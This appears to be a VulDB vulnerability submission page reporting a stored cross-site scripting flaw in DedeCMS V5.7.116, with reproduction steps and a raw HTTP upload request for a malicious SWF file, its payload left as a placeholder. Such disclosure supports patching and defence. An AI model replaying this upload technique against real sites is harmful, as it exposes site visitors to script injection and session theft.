Súbít #452983: DedeCMS V5.7.116 Cross Site Scriptingbayani

KuraDedeCMS V5.7.116 Cross Site Scripting
GaskiyaSummary DedeCMS V5.7.116 is affected by a stored cross-site scripting vulnerability that can be exploited by an attacker to upload a malicious SWF file, which can lead to XSS attacks. This vulnerability exists due to insufficient input validation and sanitization of user-supplied data. Details Log in and go to http://target-ip/member/uploads_add.php to upload the xss payload in .SWF file. image Intercept the upload request and change the mediatype parameter in the request to 2. image Observe the response, which should include a URL similar to /uploads/userup/1/XXXX.swf. image Access the provided URL to trigger the XSS vulnerability. image POC POST /member/uploads_add.php HTTP/1.1 Host: target-ip Content-Length: 963 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfRghPB9M7esxjc3h Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="f" ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="mediatype" 2 ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="keyword" ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="dopost" save ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="title" 123 ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="addonfile"; filename="xsstest.swf" Content-Type: application/x-shockwave-flash [xss payload in swf] ------WebKitFormBoundaryfRghPB9M7esxjc3h--
Manga⚠️ https://github.com/Hebing123/cve/issues/77
Màdùmga
 jiashenghe (UID 39445)
Furta11/27/2024 09:16 (1 Shettima 전)
Gargajiya12/04/2024 17:31 (7 days later)
HalittaShingilam
VulDB gite286903 [DedeCMS 5.7.116 SWF File /member/uploads_add.php mediatype Cross Site Scripting]
Nganji20

GurɗoGumtiGada

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!